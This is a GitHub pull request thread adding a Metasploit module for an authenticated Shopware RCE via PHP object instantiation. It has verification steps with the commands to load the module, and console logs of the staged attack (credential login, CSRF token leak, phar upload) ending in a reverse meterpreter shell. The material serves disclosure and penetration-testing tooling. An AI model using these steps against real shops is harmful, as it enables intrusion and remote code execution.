Added CVE-2017 18357 - Shopware createInstanceFromNamedArguments PHP Object Instantiation #11828

Merged
merged 19 commits into from May 17, 2019

@stevenseeley (Contributor) commented May 9, 2019

Background

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform.

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6 (currently the latest), 5.5, 5.4, 5.3.

References

Notes

  • I don't consider this a zero-day because it's a bypass for a patch
  • I recommend a CVSS score of 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

Setup

The following is the exact setup I used to test and analyze the vulnerability:

  • Debian GNU/Linux 9 (stretch) x64
  • MariaDB latest
  • Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo

For installation instructions, please refer to the Shopware installation guide.

Verification

  • Install Shopware as noted above
  • Install the Metasploit module
  • Start msfconsole
  • use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
  • set payload php/meterpreter/reverse_tcp
  • set LHOST x.x.x.x
  • set RHOSTS y.y.y.y
  • check
  • exploit
  • Verify that you get a meterpreter session

Example

saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
[*] Processing scripts/shopware.rc for ERB directives.
resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (scripts/shopware.rc)> set LHOST 192.168.23.1
LHOST => 192.168.23.1
resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
RHOSTS => 192.168.23.164
resource (scripts/shopware.rc)> set RPORT 8080
RPORT => 8080
resource (scripts/shopware.rc)> check
[+] 192.168.23.164:8080 - The target is vulnerable.
resource (scripts/shopware.rc)> exploit
[*] Started reverse TCP handler on 192.168.23.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
[+] Stage 2 - leaked the webroot: /var/www/html
[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 192.168.23.174
[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
[+] Deleted rguktpcw.php
[+] Deleted image/6b/7e/0c/eiuzuoii.jpg

meterpreter > sysinfo
Computer    : 45835d649528
OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
Meterpreter : php/linux
meterpreter >

@bcoles bcoles added docs module labels May 9, 2019

@wchen-r7 wchen-r7 self-assigned this May 10, 2019

stevenseeley added some commits May 10, 2019

@wchen-r7 (Contributor) commented May 14, 2019

Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

@stevenseeley (Contributor, Author) commented May 14, 2019

> Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

duuuuuude, of course, take your time!

@wchen-r7 (Contributor) commented May 17, 2019

I ran into a little trouble due to a bug but the exploit has been confirmed:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=1622223ihnauhu7tr6rvo77v1v;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: R5Wl0s547aP33xYEKGeW9BGYH5FVnV
[*] /var/www/html/shopware/media/xyefxbyu.php
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6c/48/67/zkvlolae.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:53290) at 2019-05-17 18:12:47 -0500

meterpreter > 

I can fix that bug and then land it. Thank you for the patience @stevenseeley. Always happy to see your work!

@wchen-r7 (Contributor) commented May 17, 2019

Ok now this output is better:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=d66oftua6p29p6gt7pma494vbj;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: sSbbewFwfJxeCHL4JHdoqrwb88ku0w
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/5d/b2/5c/okwnopws.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 2 opened (172.16.135.1:4444 -> 172.16.135.129:53296) at 2019-05-17 18:19:06 -0500
[+] Deleted hjqrkulj.php
[+] Deleted image/5d/b2/5c/okwnopws.jpg

meterpreter > 

Nothing major, I just had to make sure the PHP payload path is normalized:

php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")

Landing now!
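As an added illustration of the fix discussed in the comment above (this is not the module's code and not Rex's own implementation), the following stand-in for Rex::FileUtils.normalize_unix_path shows the doubled slash that appears when the leaked web root ends in "/" and the target URI path is "/". The web root is the one leaked in the thread; the URI path "/" and the file stem are constructed sample values.

```ruby
# Stand-in for Rex::FileUtils.normalize_unix_path (assumption: Rex's version
# collapses repeated slashes and "." segments in the same way). Not Rex code.
def normalize_unix_path(path)
  out = []
  path.split('/').each do |seg|
    case seg
    when '', '.' then next    # drop empty segments ("//") and "."
    when '..'    then out.pop # resolve ".." against the previous segment
    else              out << seg
    end
  end
  (path.start_with?('/') ? '/' : '') + out.join('/')
end

# Compose the PHP payload path the way the module interpolates it:
# "#{webroot}#{target_uri.path}media/#{name}.php"
# Returns [raw, normalized] so the difference is visible.
def payload_path(webroot, target_uri_path, name)
  raw = "#{webroot}#{target_uri_path}media/#{name}.php"
  [raw, normalize_unix_path(raw)]
end

# Constructed sample: leaked web root from the thread, base URI "/".
raw, clean = payload_path('/var/www/html/shopware/', '/', 'xyefxbyu')
puts raw    # /var/www/html/shopware//media/xyefxbyu.php
puts clean  # /var/www/html/shopware/media/xyefxbyu.php
```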

@wchen-r7 wchen-r7 merged commit 1df703b into rapid7:master May 17, 2019

2 checks passed: Metasploit Automation - Sanity Test Execution (successfully completed all tests); Metasploit Automation - Test Execution (successfully completed all tests).

wchen-r7 added a commit that referenced this pull request May 17, 2019

@wchen-r7 (Contributor) commented May 17, 2019

Release Notes

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform.

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

msjenkins-r7 added a commit that referenced this pull request May 17, 2019

@stevenseeley stevenseeley deleted the stevenseeley:CVE-2017-18357 branch May 17, 2019

@todb-r7 (Contributor) commented May 22, 2019

> This vulnerability is a bypass for CVE-2017-18357

So, I had a conversation with some MITRE & CERT folks about this bug, and the consensus was that this does seem to describe a new vulnerability after all. Looking at rule CNT1, it's an independently fixable issue, so it looks like the old vuln and this new vuln are, from CVE's perspective, two different vulnerabilities (even though they end up hitting the same codepath). Practically speaking, someone looking at Shopware CVEs from a vuln management perspective may not know that the old patch is insufficient unless and until there's a new CVE that specifically points that out.

I'll take on wrangling that new CVE for @stevenseeley.

@stevenseeley (Contributor, Author) commented Jun 13, 2019

CVE-2019-12799
